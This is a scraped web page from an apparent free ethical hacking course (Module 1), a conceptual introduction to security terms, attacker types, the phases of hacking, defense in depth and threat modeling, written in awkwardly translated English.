Ethical Hacking

Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 139

en.gburu.

net

 Home
 Courses
 FREE $10 in DigitalOcean
 about
 contact
 gburu.net

Subscribe
23 January 2018

Ethical Hacking Course - Module 1 -


Introduction to Ethical Hacking
Ethical Hacking Course, Computer Security

In module 1 of this course of free computer security, we will see all the necessary foundations
for you to enter in subject with the terms that are used in the field of security of both computing
and information. For you to orient yourself better I will make an index of topics below for this
module.

Before continuing with this introduction to computer security, I recommend that you see the
introduction to computer networks and how to build a secure network.

Full course: en.gburu.net/hack, here you will find all the topics of this free ethical hacking
course, in one place.

Responsibility:
This course is oriented to educational purposes to improve your computer security skills to plan
and design safer networks, does not incite illegal activities in systems or networks of third
parties, if you commit an illegal activity in a system or network you will do it under your own
responsibility. If you want to practice and improve your skills in ethical hacking, do it under
systems where you have a legal permit or are yours, I recommend using images of operating
systems installed in virtual machines in a controlled environment.

Recommended: How to build a secure network, introduction to networks and their security

Agenda for Module 1 - Introduction to Ethical Hacking

 Objectives of module 1
 Essential terms
 Elements of Information Security
 Main vectors of attacks against information systems, potential threats, motives and
objectives of the attacker.
 What is the Information War?
 Threats and attacks against IPv6
 Hacker vs Ethical Hacker
 Effects of a hack against a company
 Types of Hackers
 What is Hacktivism?
 Phases of Hacking
o Phase: recognition
 Recognition: passive
 Recognition: active
o Phase: scanning
o Phase: get access
o Phase: erase tracks
 What is steganography?
 Tunneling
 types of attacks against a computer system
 What is Ethical Hacking?
 Why is Ethical Hacking necessary?
 Why do companies hire hackers?
 Achieved and limitations of Ethical Hacking
 What is defense in depth?
 Information Security Controls
 Information assurance
 Threat Modeling
 Enterprise Information Security Architecture (EISA)
 Design network zones for more security
 Understand what Information Security Policies are
o classification of security policies
o structure and internal content
o Types of Security Policies
o Examples of Security Policies
o Steps to design and implement good information security policies in a company
o Privacy Policies for employees
o Involvement of Human Resources and Legal departments in security policies
 Physical Security, threats and controls
 Incident Management Responses, processes and responsibilities of an incident
management team.
 What is the Vulnerability Assessment?
o Types of vulnerability assessments
o Vulnerability assessment methodologies
 Vulnerability Research
 What is Pentesting?
o Types of Pentesting
o Why is Pentesting necessary?
o Recommended methodologies to perform a Pentesting
o Comparison: Security Audit, Vulnerability Assessment and Pentesting, what
differences do they have?
o Phases of Pentesting
o Teams: Blue vs Red

Objectives of module 1
It is important to bear in mind that attackers attack systems for various reasons and both political
and personal purposes. Therefore, it is vital to understand how malicious hackers attack systems
and the probable reasons behind attacks. As Sun Tzu wrote in his book: Art of War "If you
know yourself, but not the enemy, for every victory you win, you will also suffer a defeat."
It is the duty of system administrators and network security professionals to protect their
infrastructure from vulnerabilities by knowing the enemy (malicious hackers) who seek to use
the same infrastructure for illegal activities.

The "Ethical Hacking" is the process of verifying and testing the network of the organization to
detect possible gaps and vulnerabilities that attackers can use to hack an infrastructure, the same
methods should be used that would be used by a malicious hacker but with ethics and precaution
not to damage the hardware or information that is intended to protect. Individuals or experts who
perform ethical hacking are called white hats. They carry out hacking in an ethical way, without
causing any damage to the computer system and have a legal permission granted by the owner of
the infrastructure, therefore it is considered a legal or ethical activity, this is why computer
security is one more branch of the computer thanks to these professionals organizations or
everyday people can have a little more security when they perform their activities on the Internet,
basically the ethical hacker is paid to go one step ahead of malicious hackers.

Upon completion of this module you are expected to have learned the following:

 Essential terms
 Understand the elements of Information Security
 Main vectors of attacks by hackers
 Threats to Information Security
 Understand what Ethical Hacking is, necessary skills, reach of an ethical hacker, and
what sets it apart from a malicious hacker.
 Potential effects on an attack against an Organization
 Who is a hacker?
 Stages of a computer attack
 Types of attacks against a computer system
 Process of Management against an Accident
 Types of Security Policies
 Vulnerability Research
 What is Penetration Testing?
Essential terms
Now we will see what is the meaning of each term that you will see very often if you dedicate
yourself to computer security.

 Hacked: is the notion among hackers that something is worthwhile or interesting,


hackers may feel that breaking the security of the hardest network can give them great
satisfaction, and that is something they achieved and that not all could do.
 Vulnerability: is a weakness in the design or an implementation error that can lead to an
unexpected and undesirable event that compromises the security of the system. In the
sample words, a vulnerability is a hole, a limitation or weakness of the cycle that
becomes a source for an attacker to enter the system by ignoring the various user
authentications.
 Exploit: an exploit is a defined way to violate the security of a computer system through
vulnerability. The term exploit is used when any type of attack has occurred on a system
or network. An exploit can also be defined as malicious software or commands that can
cause unexpected behavior in legitimate software or hadrware exploiting the
vulnerabilities already found.
 Target of evaluation: can be a computer system, product or component that is identified
/ submitted to a required security assessment. This type of evaluation helps the evaluator
to understand the operation, technology and vulnerabilities of a particular system or
product.
 Zero-day Attack: Attacker exploits vulnerabilities in the computer application before the
software developer releases a patch for them.
 Pivoting: Once an attacker obtains access to a system, it seeks to control the entire
infrastructure pivoting, that is, passing from system to system while gaining control of
each one and using them for malicious activities. It becomes difficult to identify the
attacker while using the systems of others to perform illegal activities.
 Payload: is the part of an exploit code that performs the desired malicious action, such as
destroying, creating backdoors and hijacking a computer.
 Doxing: publication of personal identification information about an individual compiled
from public databases and social networks.
 Bot: is a software application that can be controlled remotely to run or automate
predefined tasks, lately they became popular in the policy, as they can react automatically
on a topic that is spoken on the networks social or about an opponent who said what he
did not like, tend to be aggressive.

Information Security Elements


The security of information is defined as: "A state of well-being of information and
infrastructure in which the possibility of theft, alteration and interruption of information
and services remains low or tolerable". It is based on the five main elements of:
confidentiality, integrity, availability, authenticity and non-repudiation.
 Confidentiality: it is the guarantee that the information is accessible only to those
authorized to have access. Confidentiality violations may occur due to incorrect data
handling or a hacking attempt.
 Integrity: is the reliability of the data or resources in terms of preventing undue and
unauthorized changes, the guarantee that you can trust that the information is sufficiently
accurate for its purpose.
 Availability: is the guarantee that the system responsible for the delivery, storage and
processing of information is accessible when authorized users require it.
 Authenticity: refers to the characteristic of a communication, document or any data that
guarantees the quality of being genuine or uncorrupted of the original. The main
authentication functions include confirming that the user is who they say they are and
guaranteeing that the message is authentic and not altered or falsified. Biometrics, smart
cards and digital certificates are used to guarantee the authenticity of data, transactions,
communications or documents.
 Non-repudiation: refers to the ability to guarantee that a part of a contract or a
communication can not deny the authenticity of your signature on a document or the
sending of a message that originated. It is a way to guarantee that the sender of a message
can not deny the message and that the recipient can not deny having received the
message.

Triangle of Security, Functionality and Usability

Technology is evolving at an unprecedented rate. As a result, new products that reach the market
tend to be designed for easy-to-use rather than secure computing. The technology, originally
developed for "honest" research and academic purposes, has not evolved at the same pace as the
user's profile. In addition, during this evolution, system designers often overlook vulnerabilities
during the planned implementation of the system. However, increasing the built-in default
security mechanisms means that users must be more competent. As computers are increasingly
used for routine activities, it is increasingly difficult for the system administrator and other
system professionals to allocate resources exclusively to protect the systems. This includes the
time required to verify log files, detect vulnerabilities, and apply security update patches.

routine activities consume time to system administrators, leaving less time for an administration
to monitor security. There is little time to implement measures and safe computing resources in a
regular and innovative way. This has increased the demand of professionals dedicated to security
to monitor and defend constantly the resources of the ICT (information technology and
communication).

Originally, "hacking" meant having extraordinary computer skills to extend the limits of
computer systems. Piracy requires great competition. However, today there are tools and
automated codes available on the Internet that make it possible for anyone who has the will and
desire to hack and succeed, and it is also very likely that the authorities will detect it because
they do not have the technical knowledge to be undetectable
The mere commitment of the safety of a system does not mean that it is completely safe. There
are websites that insist on "recovering the network", as well as people who believe they are doing
a great favor by publishing details of exploits. These can act to the detriment and can reduce the
skill level required to become a successful attacker.

The ease with which vulnerabilities in the system are exploited has increased, while the
knowledge curve needed to carry out these exploits has been shortened. The concept of
elite/super hacker is an illusion. However, the fast-evolving "script kiddies" genre is largely
committed to less skilled individuals who have second-hand knowledge about performing feats.
One of the main impediments that contribute to the growth of security infrastructure lies in the
unwillingness of victims exploited or committed to report the incident for fear of losing the
goodwill and faith of their employees, customers and partners, and/or lose market share. The
trend of information assets influencing the market has seen more companies thinking twice
before reporting incidents to law enforcement for fear of bad press and negative publicity.

The increasingly interconnected environment, where companies tend to have their website as the
only point of contact, makes it essential for managers to take measures to avoid exploitations that
can lead to data loss. This is an important reason why Companies must invest in security
measures. To protect your information assets.

Main attack vectors against Information Systems

An attack is a route or means by which an attacker gains access to an information system to


perform malicious activities. This attack vector allows an attacker to take advantage of the
vulnerabilities present in the information system to carry out a particular attack.

Although there are some traditional attacks from which an attack can be made, the attack vectors
come in many forms, you can not predict how an attack vector can come.

The following are the possible main attack vectors through which attackers can attack
information systems:

 Virtualization and Cloud Computing: is an on-demand delivery of IT capabilities


where the confidential data of the organization and the clients is stored; faults in a client
application allow the attackers to access other client data.
 Organized cyber crime
 Software not patched
 Malware targeted
 Social networks
 Internal threats
 Botnets
 Lack of cybersecurity professionals
 Network applications
 Inadequate security policies
 Mobile device security
 Compliance with Government Laws and regulations
 Complexity of the computer infrastructure
 Hacktivism
 Advanced Persistent Threat (APT): is an attack that focuses on stealing information
from the victim's machine without the user's knowledge, they are usually groups of
hackers that belong to a Nation-State because they have great resources economic and
technical skills.
 Mobile Threats: the focus of attackers has shifted to mobile devices due to the increased
adoption of mobile devices for commercial and personal purposes, and comparatively
minor security controls performed by administrators on employees' mobile devices of the
organization.

Reasons, goals and objectives behind the attacks

Attackers generally have reasons or objectives behind making information security attacks. It
may be disrupting the business continuity of the target organization, stealing valuable
information, for the sake of curiosity or even taking revenge on the target organization.
Therefore, these motives or objectives depend on the mood of the attackers, for what reason they
are carrying out this activity. Once, the attacker determines his objective, he or she can attack the
system, security policy and its controls.

Reasons:

 Disrupt business continuity


 Information theft
 Manipulating data
 Creating fear and chaos by interrupting critical infrastructures
 Propagate religious or political beliefs
 Reach state military objectives
 Damaging the reputation of the target
 Taking personal revenge

Potential threats against an Information System

Threats against an information system can be very broad but it is generally divided into 5 groups
of greater relevance: natural, physical, network, host-based and applications.

 Natural: natural disasters, floods, earthquakes, hurricanes.


 Physical: loss or damage of system resources, physical intrusion, sabotage, espionage
and errors.
 Network: information gathering, tracking and spying, spoofing, session hijacking and
Man in the middle attack, DNS and ARP poisoning, password-based attack, denial-of-
service attack, compromised key attack, aa attacks Firewalls and IDS.
 Host: malware attacks, footprinting, password attacks, ddos, arbitrary code execution,
unauthorized access, escalation of privileges, backdoor attacks, physical security threats.
 Application: incorrect data / entry validation, authentication and authorization attacks,
incorrect security settings, information disclosure, interrupted session management,
buffer overflow problems, cryptography attacks, SQL injection, incorrect handling of
errors and exception management.

A network, is defined as the collection of computers and other hardware connected by


communication channels to share resources and information. As the information travels from one
computer to another through the communication channel, a malicious person can enter the
communication channel and steal the information that travels through the network. The attacker
can impose various threats on a target network.

Host threats, are directed to a particular system in which valuable information resides. Attackers
attempt to violate the security of the information system resource.

Application, if the appropriate security measures are not considered during the development of
the particular application, the application may be vulnerable to different types of application
attacks. Attackers exploit vulnerabilities in the application to steal or damage system
information.

Attacks against an operating system

Attacks to the operating system: attackers look for vulnerabilities in the design, installation or
configuration of operating systems and exploit them to gain access to a system, buffer overflow
vulnerabilities, errors in the operating system, unpatched operating system, etc.

Misconfiguration attacks, incorrect configuration vulnerabilities affect web servers, application


platforms, databases, networks or frameworks that can result in illegal or potential access system
possession, it is common to leave the configuration by default this is a serious security error.

Attacks at the application level, attackers exploit vulnerabilities in applications that run in
organizations' information system to gain unauthorized access and steal or manipulate data.

Shrink-wrap code attacks, attackers exploit default settings and library configurations and
standard code.

Information Warfare

The term information warfare refers to the use of information and communication technologies
(ICT) to take competitive advantage over an opponent.
Defensive information warfare: refers to all strategies and actions to defend against attacks
against ICT assets.

Offensive information warfare: refers to information warfare that involves attacks against the
assets of an opponent's ICT.

All the governments of the world have seen the Internet as a new battlefield both for spying,
sabotaging elemental institutions of the enemy such as the electrical network or simply carrying
out political propaganda, that is why new civilian institutions have been created as military to
counteract computer attacks and to perform them too.

In the image we can see 3 US agencies dedicated to the offensive (hacking) and defensive
computing. these are: U.S. Cyber Command, National Security Agency (NSA) y Central
Security Service.

IPv6 Security Threats

In comparison with IPv4, IPv6 has an improved security mechanism that guarantees a higher
level of security and confidentiality for the information transferred through a network. However,
IPv6 is still vulnerable. It still has information security threats that include.

 Automatic configuration: IPv6 allows automatic configuration of IP networks, which


can leave the user vulnerable to attacks if the network is not configured correctly and
securely from the beginning.
 Protection based on the reputation of unavailability: current security solutions use the
reputation of IP addresses to filter the first sources of malware, providers will take time to
develop a reputation-based protection for IPv6.
 Incompatibility of registration systems: IPv6 uses 128-bit addresses, which are stored
as a 39-digit string, while IPv4 addresses are stored in a 15-character field, registry
solutions designed for IPv4 may not work in IPv6-based networks.
 Speed limitation problem: administrators use a speed limitation strategy to slow down
the automated attack tool, however, it is not practical to qualify the limit at the 128-bit
address level.

The following IPv6 security threats can also cause serious damage to your network:

Translation problems from IPv4 to IPv6: translation of IPv4 traffic to IPv6 can result in poor
implementation and can provide a potential attack vector.

Security information and event management (SIEM) problems: each IPv6 host can have
multiple IPv6 addresses simultaneously, which leads to the competition of the log or event
correlation.
Denial of service (DOS): overload of network security and control devices can significantly
reduce the availability threshold of network resources, leading to DOS attacks.

Handover: advanced IPv6 network discovery features can be exploited by attackers who can
traverse your network and access restricted resources.

Hacker vs. Ethical Hacker


Most people do not understand the difference between hacker and ethical hacker. These two
terms can be differentiated according to the intentions of the people who carry out hacking
activities. However, understanding the true intentions of hackers can be quite difficult.

Hacker (malicious): refers to exploiting system vulnerabilities and endangering security


controls to obtain unauthorized or inappropriate access to system resources. It implies modifying
the characteristics of the system or the application to achieve an objective external to the original
purpose of the creator, its activity is illegal.

Hacker (ethical): implies the use of hacking tools, tricks and techniques to identify
vulnerabilities in order to guarantee the security of the system. It focuses on the simulation
techniques used by attackers to verify the existence of exploitable vulnerabilities in the security
of the system with a legal permission to carry out their activities.

Effects of malicious hacking on businesses

According to the 2012 Symantec Information Status Survey, information costs businesses around
the world $ 1.1 trillion dollars annually. Each company must provide solid security for its
customers, otherwise the company can put its reputation at risk and even face lawsuits. Attackers
use hacking techniques to steal and redistribute the intellectual property of companies and, in
turn, obtain financial gains. Attackers can make a profit, but the victim company must face huge
financial losses and lose its reputation.

Once an attacker gains control over the user's system, they can access all files stored on the
computer, including personal or corporate financial information, credit card numbers and
customer data stored in that system. If such information falls into the wrong hands, it can create
chaos in the normal functioning of an organization.
Organizations must provide strong security to their critical information sources that contain
customer data and their upcoming releases or ideas. If the data is altered or stolen, a company
can lose credibility and the trust of its customers. In addition to the possible financial loss that
can occur, the loss of information can cause a company to lose a crucial competitive advantage
over its rivals. Sometimes attackers use botnets to launch Dos virus types and other web-based
attacks. This causes target business services to go down, which in turn can lead to loss of
revenue.

There are many things that companies can do to protect themselves and protect their assets.
Knowledge is a key component to address this problem. The assessment of the prevailing risk in
a business and how attacks could potentially affect that business is paramount from the point of
view of security. One does not have to be a security expert to recognize the damage that can
occur when a company is victimized by an attacker. By understanding the problem and
empowering employees to facilitate protection against attacks, the company could face any
security issues as they arise.

A hacker (malicious hacker) is a person who illegally enters a system or network without
authorization to destroy, steal confidential data or perform malicious attacks. Hackers can be
motivated for a multitude of reasons:

 Smart individuals with excellent computer skills, with the ability to create and explore the
software and hardware of computers.
 For some hackers, hacking is a hobby to see how many computers or networks can
compromise.
 Your intention may be to gain knowledge or poke doing illegal things.
 Some pirate with malicious intentions, such as stealing business data, credit card
information, social security numbers, email passwords, etc.

Types of Hackers

 Black Hats: are individuals with extraordinary computer skills who resort to malicious or
destructive activities and are also known as crackers. These people mainly use their skills
only for destructive activities, causing great losses for both companies and individuals.
They use their skills to find vulnerabilities in various networks, including defense and
government websites, banking and finance, etc. Some do it because they cause damage,
steal information, messy data or earn money easily by hacking IDs from bank customers.
 White hats (White Hats): are individuals who possess hacking skills and use them for
defensive purposes, they are also known as computer security analysts. These days,
almost all companies have computer security analysts to defend their systems against
malicious attacks. White hats help companies protect their networks from outside
intruders, this course is focused on becoming a white hat.

Image: parody of the "friendly" relationship between computer security analysts and malicious
hackers.

 Gray Hats: are individuals who work both offensively and defensively at different times.
The gray hats fall between the black and white hats. Gray hats could help hackers to find
various vulnerabilities in a system or network and, at the same time, help providers to
improve products (software or hardware) by checking the limitations and making it more
secure, etc.
 Suicide Hackers: are people who want to tear down a critical infrastructure for a "cause"
and are not worried that they have been imprisoned for 30 years for their actions. Suicide
hackers are closely related to suicide bombers, who sacrifice their lives for the attack and
are not worried about the consequences of their actions. There has been an increase in
cyber terrorism in recent years.
 Script kiddies: are the unqualified hackers that endanger the systems running scripts,
tools and software developed by real hackers. They use small and easy to use programs or
scripts, as well as distinguished techniques to find and exploit the vulnerabilities of a
machine. Script kiddies usually focus on the number of attacks rather than on the quality
of the attacks they initiate.
 Spy Hackers: are people who are employed by an organization to penetrate and obtain
commercial secrets from the competitor. These experts can take advantage of the
privileges they have to hack into a system or network.
 Cyber terrorist: could be people, organized groups formed by terrorist organizations,
who have a wide range of skills, motivated by religious or political reasons to create fear
by the large-scale disruption of computer networks. This type of hackers is more
dangerous, as they can hack not only a website but also whole areas of the Internet.
 State-sponsored hackers: are people employed by the government to penetrate and
obtain top secret information and to damage the information systems of other
governments, in this class can enter the white hats that work for government agencies or
military agencies and computer criminals with great skills hired by a state.
 Hacktivist: individuals who promote a pirated political agenda, especially by defacing or
disabling the website, there is a very famous group of hacktivists called "Anonymous".

Hacktivism

Hacktivism is an act of promoting a hacking political agenda, especially by defacing or disabling


websites. The person who does these things is known as a hacktivist.

 Hacktivism thrives in an environment where information is easily accessible


 Your goal is to send a message through piracy activities and get visibility for a cause
 Common objectives include government agencies, multinational corporations or any
other activity perceived as "bad" or "incorrect" by these groups or individuals
 However, it remains a fact that getting unauthorized access is a crime, no matter what the
intent is
 Hacktivism is motivated by revenge, political or social reasons, ideology, vandalism,
protest and the desire to humiliate the victims.

Hacking Phases
The hacking has 5 main phases are: Recognition, scanning, gain access, maintain access and
delete fingerprints, then we will see more details each of these phases to perform a proper hack.

1. Recognition

Recognition refers to the preparatory phase where an attacker gathers as much information as
possible about the target before launching the attack. It is the most important phase since it must
be done well to have more information about the objective this will give more chances of
success, Abraham Lincoln: "Give me 6 hours to cut a tree and I will spend the first 4
sharpening the ax" , the phrase of Abraham can be applied in this case since it is advisable to
spend more time in recognition of the objective than in the attack, there are 2 types of
recognitions: passive and active.

Also in this phase, the attacker resorts to competitive intelligence to learn more about the
objective. This phase may also involve network scanning, either external or internal, without
authorization.

This is the phase that allows the potential attacker to devise strategies for his attack. This may
take some time while the attacker waits to discover crucial information. Part of this recognition
may involve "social engineering". A social engineer is a person who speaks fluently to people to
reveal information such as: phone numbers, passwords and other confidential information that
are not listed.

Another recognition technique is "container diving". Dumpster diving is the process of searching
the garbage of an organization for confidential information discarded, attackers can use the
Internet to obtain information such as contact information of employees, business partners,
technologies in use and other critical business knowledge, but "diving in container "can provide
you with even more sensitive information, such as user names, passwords, credit card statements,
bank statements, ATM vouchers, social security numbers, telephone numbers, etc. The target
range of recognition may include the clients, employees, operations, networks and systems of the
target organization. To avoid that, it is recommended that you do not throw away sensitive or
accounting information before throwing it away; it is better to make sure to destroy it or leave it
in a state that can not be read or deciphered.

For example, a Whois database can provide information about Internet addresses, domain names
and contacts. If a potential attacker obtains DNS information from the registrar and can access it,
you can obtain useful information, such as the assignment of domain names to IP addresses, mail
servers and host information records. It is important that a company have appropriate policies to
protect its information assets, and also provide guidelines to its users of it. Raising awareness
about the precautions that users must take to protect their information assets is a critical factor in
this context.

Recognition techniques can be broadly categorized into active and passive recognition.

When an attacker approaches the attack using passive recognition techniques, it does not interact
directly with the system, the attacker uses public domain social information and containerized
diving as a means to gather information.

Passive recognition: implies acquiring information without interacting directly with the
objective, for example: search for public records or new releases.
When an attacker uses active reconnaissance techniques, he tries to interact with the system
using tools to detect open ports, accessible hosts, router locations, network mapping, details of
operating systems and applications, this implies that it can be detected.

The next phase of attack is scanning, which is discussed in the next section, some experts do not
differentiate scanning from active recognition. However, there is a slight difference since the
scan involves a deeper probe by the attacker, often overlapping the recognition and exploration
phases, and it is not always possible to delimit these phases as watertight compartments.

Active reconnaissance is generally used when the attacker points out that there is a low
probability that these reconnaissance activities will be detected. Novices and screenwriters are
often found trying to get quicker and more visible results, and sometimes just for the boastful
value they can get.

Active recognition: involves directly interacting with the target by any means, for example:
phone calls to the help desk or technical department.

As an ethical hacker, you must be able to distinguish between various methods of recognition
and be able to advocate for preventive measures in light of possible threats. Companies, for their
part, must address security as an integral part of their business and / or operational strategy, and
must be equipped with adequate policies and procedures to verify such activities.

2. Scanning

Scanning is what an attacker does before attacking the network. When scanning, the attacker
uses the details collected during reconnaissance to identify specific vulnerabilities, the scan can
be considered a logical extension (and overlay) of active reconnaissance. Often, attackers use
automated tools such as network / host scanners to locate systems and attempt to discover
vulnerabilities.

An attacker can gather critical network information, such as assigning systems, routers and
firewalls by using simple tools such as Traceroute. Alternatively, they can use tools like cheops
to add sweep functionality along with what Traceroute draws.

Port scanners can be used to detect listening ports and find information about the nature of the
services running on the target machine. The main defense technique in this sense is to close the
services that are not necessary. Appropriate filtering can also be adopted as a defense
mechanism. However, attackers can still use tools to determine the rules implemented for
filtering.

The most commonly used tools are vulnerability scanners that can search for several known
vulnerabilities in a target network and potentially detect thousands of vulnerabilities. This gives
the attacker the advantage of time because he or she only has to find a single means of income,
while the system professional must secure many vulnerable areas by applying patches.
Organizations that implement intrusion detection systems (IDS) still have cause for concern
because attackers can use evasion techniques at both the application and network level.

The scan is the part where the attacker has to try to get more information but can not hide so it
can be detected, in this phase tools such as network mappers, ping tools and vulnerability
scanners are used among others, the goal is try to collect more accurate information of the
systems within the infrastructure information such as: number of devices in the network,
information about their operating systems, types and status of open ports, types of devices, etc.

3. Get access

Gaining access is the most important phase of an attack in terms of potential damage. It refers to
the point where the attacker gained access to the operating system or applications on the
computer or network, the attacker can get access at the level of the operating system, application
level or network level. Factors that influence the chances of an attacker gaining access to an
objective system include the architecture and configuration of the target system, the skill level of
the perpetrator, and the initial level of access obtained. The attacker initially tries to gain
minimal access to the target system or network. Once you get access, try to scale the privileges
to get complete control of the system, in the process the intermediate systems that are connected
are also compromised.

Attackers do not always need to gain access to the system to cause damage, for example, denial
of service attacks can deplete resources or prevent services from running on the target system.
Stopping the service can be carried out by killing processes, using a logic / time bomb, or even
reconfiguring and blocking the system. The resources can be exhausted locally by completing the
outgoing communication links.

The exploit can occur locally, without connection through a LAN or Internet as a cheat or theft,
examples include stack-based buffer overflows, denial of service and session hijacking.
Attackers use a technique called spoofing to exploit the system by pretending to be someone
else.

4. Keep access

Once an attacker gains access to the target system, the attacker can choose to use both the system
and its resources and use the system as a launch pad to explore and exploit other systems, or to
maintain a low profile and continue to exploit the system . Both actions can damage the
organization. For example, the attacker can implement a sniffer to capture all network traffic,
including telnet and ftp sessions with other systems.
Attackers, who choose not to be detected, remove evidence of their entry and use a backdoor or
trojan to gain repeated access. They can also install rootkits in the kernel to get superuser access.
The reason behind this is that rootkits get access at the operating system level while a Trojan
horse gets access at the application level. Both the rootkits and the Trojans depend on the users
to install them. Within the Windows system, most Trojans are installed as a service and run as a
local system, which has administrative access.

Attackers can use Trojans to transfer usernames, passwords and even credit card information
stored in the system. They can maintain control of their system for a long time by "hardening
the system" against other attackers, and sometimes, in the process, they can provide some degree
of protection to the system from other attacks. They can then use their access to steal data,
consume CPU cycles and exchange confidential information or even resort to extortion.

Organizations can use intrusion detection systems or deploy honeypots and honeynets to detect
intruders. However, the latter is not recommended unless the organization has the security
professional required to take advantage of the concept of protection.

5. Delete fingerprints

An attacker wants to destroy evidence of his presence and activities for several reasons, such as
maintaining access and evading punitive actions. Trojans such as ps or netcat are useful for any
attacker who wants to destroy the evidence in the registry files or replace the system binaries
with them. Once the Trojans are in place, the attacker can be designed to hide the presence of the
Trojan. When running the script, a variety of critical files are replaced by Trojan versions, hiding
the attacker in seconds. Other techniques include steganography and tunneling.

Steganography, is the process of hiding data, for example, in images and sound files.

Tunneling, takes advantage of the transmission protocol by carrying one protocol over another.
Even the extra space (unused bits) in the TCP and IP headers can be used to hide information.
An attacker can use the system as a system in the network without being detected. Therefore, this
attack phase can become a new attack cycle by the use of reconnaissance techniques once again.

There have been cases in which an attacker has stalked into a system even when system
administrators have changed security policies. System administration can implement host-based
IDS (HIDS) and antivirus tools that can detect Trojans and other apparently benign files and
directories. As an ethical hacker, you must know the tools and techniques deployed by attackers
so you can advocate and take action to ensure protection. In the following modules we will see
more of this with more details in depth.
Types of Attacks
There are several ways in which an attacker can gain access to a system. The attacker must be
able to exploit a weakness of vulnerability in a system:

 Operating system attacks: attackers look for operating system vulnerabilities and
exploit them to gain access to a system on the network.
 Attacks at application level: software applications come with innumerable features and
features. It is not necessary to perform full tests before launching products. These
applications have several vulnerabilities and become a source of attack.
 Deconfiguration attacks: most administrators do not have the necessary skills to
maintain or solve problems, which can lead to configuration errors. Such configuration
errors can become the sources for an attacker to enter the target network or system.
 Shrink wrap code attacks: Operating system applications come with numerous sample
scripts to simplify administrator work, but the same scripts have several vulnerabilities,
which can lead to wrapping code attacks by contraction.

What is ethical hacking?


Ethical hacking involves the use of hacking tools, tricks and techniques to identify vulnerabilities
in order to guarantee the security of the system, focusing on the simulation of techniques used by
attackers to verify the existence of exploitable vulnerabilities in the company's infrastructure .
Ethical hackers perform a security assessment of your organization with the permission of
authorities interested in obtaining or improving the security of your business, therefore the
activities of the ethical hacker are the same as those of malicious hackers but in a controlled
environment and legally.

Why is ethical hacking necessary?


To beat a malicious hacker, you must think like one!

Ethical hacking is necessary, since it allows you to counteract malicious hacker attacks by
anticipating the methods used by them to enter a system. There is rapid growth in technology, so
there is a growth in the risks associated with technology. Ethical hacking helps to predict the
various possible vulnerabilities well in advance and to solve them without suffering an attack
from a third party.

 Ethical hacking: hacking involves creative thinking, vulnerability testing and security
audits can not guarantee that the network is secure.
 Defense in depth strategy: to achieve this, organizations must implement a strategy of
"defense in depth" to penetrate their networks to estimate vulnerabilities and expose
them.
 Counter attacks: Ethical hacking is necessary because it allows you to counteract the
attacks of malicious hackers by anticipating methods they can use to enter a system.
Reasons why organizations recruit ethical hackers

 To prevent malicious hackers from accessing the organization's information systems.


 Discovering vulnerabilities is systems and exploring their potential as a risk.
 To analyze and strengthen an oganization security stance that includes policies, network
protection infrastructure and practices for the end user.

Skills of an Ethical Hacker

Ethical hacking is hacking or auditing the computer security of a company in a legal way
performed by pentester to find vulnerabilities in the information technology environment. To
perform ethical hacking, the ethical hacker requires the skills of a computer expert. Ethical
hackers must also have a solid knowledge of computer science, including programming and
networking. They must be competent in the installation and subsequent maintenance with the
popular operating systems (UNIX, Windows, Linux, Android, iOS, MacOS).

Detailed knowledge of the hardware and software provided by popular computer and network
hardware vendors complements this basic knowledge. It is necessary that ethical hackers have an
additional specialization in security. It is an advantage to know how several systems maintain
their security, the management skills corresponding to these systems are necessary for the real
vulnerability tests and to prepare the report once the tests are carried out.

An ethical hacker must have immense patience since the analysis stage consumes more time than
the testing stage. The time frame for an evaluation can vary from a few days to several weeks,
depending on the nature of the task. When an ethical hacker encounters a system with which he
is not familiar, it is imperative that the person take the time to learn everything about the system
and try to find their most vulnerable points.

The knowledge an ethical hacker must have or that he should learn can be divided into 2 groups:
technical knowledge and non-technical.

1. Technical knowledge:

 Have a deep knowledge of the main operating environments, such as Windows, Unix,
Linux and MacOS.
 Have a deep knowledge of network concepts, technologies and hardware and related
software
 Should be a computer expert expert in technical domains
 Have knowledge of security areas and related matters
 Have a high technical level to launch sophisticated attacks

2. Non-technical knowledge
This part is more focused on your ethical part, as a person and your level of commitment
to your work in an organization.
 Ability to learn and adapt new technologies quickly
 Strong work ethic, and good problem solving and communication skills
 Committed to the organization's security policies
 Awareness of local laws and standards

** Reach and limitations of ethical hacking **

 I reached
* Ethical hacking is a crucial component of risk assessment, audit, anti-fraud, best
practices and government.
* Used to identify risks and highlight corrective actions, and reduce the costs of
information communication technology (ICT) by resolving those vulnerabilities.
 Limitations
* Unless companies first know what they are looking for and why they are hiring an
external provider to hack systems, it is likely that the experience does not generate much.
* Therefore, an ethical hacker can help the organization to better understand its
security system, but it is up to the organization to implement the correct guarantees in the
network.

Defense in Depth

Multiple defensive countermeasures are taken in depth to protect a company's information assets.
The strategy is based on the military principle that it is harder for an enemy to defeat a complex
and multi-layered defense system than to penetrate a single barrier. If a hacker gains access to a
system, defense in depth minimizes the adverse impact and gives administrators and engineers
time to implement new or updated countermeasures to prevent it from happening again.

Defense in depth is a security strategy in which several layers of protection are placed in an
entire information system, helping to prevent direct attacks against an information and data
system because a break in only one leads the attacker to the next layer.

Information Security Controls

Information Assurance
Information Assurance, refers to the guarantee that the integrity, availability, confidentiality
and authenticity of the information systems are in conditions and protected during use,
processing, storage and transmission of information.

Some of the processes that help achieve information security include:

1. Develop local policies, processes and guidance


2. Network and user authentication strategy design
3. Identification of problems and resource requirements
4. Create a plan for the identified resource requirements
5. Application of appropriate information assurance controls
6. Performing certification and accreditation
7. Provide information assurance training

Modeling of threats

Threat modeling is a risk assessment approach to analyze the security of an application by


capturing the organization and analyzing all the information that affects the security of an
application.

1. Identify security objectives: helps determine how much effort is needed to put in
subsequent steps
2. Application overview: identify components, data flows and confidence limits
3. Decompose the application: helps you find more relevant and more detailed threats
4. Identify threats: identify the threats relevant to your control and context scenario using
the information obtained in steps 2 and 3.
5. Identify vulnerabilities: identify weaknesses related to threats found using vulnerability
categories

Enterprise Information Security Architecture (EISA)

EISA is a set of requirements, processes, principles and models that determine the structure and
behavior of the information systems of an organization.

Objectives of EISA:

1. It helps to monitor and detect network behaviors in real time, acting on external and
internal security risks.
2. Help an organization detect and recover from security attacks.
3. Help prioritize the resources of an organization and pay attention to various threats.
4. Organization of benefits in prospective costs when incorporated into the provision of
security, such as response to incidents, disaster recovery, correlation of events, etc.
5. Help analyze the procedure necessary for the IT department to function correctly and
identify the assets.
6. Helps to perform the risk assessment of the IT assets of an organization with the
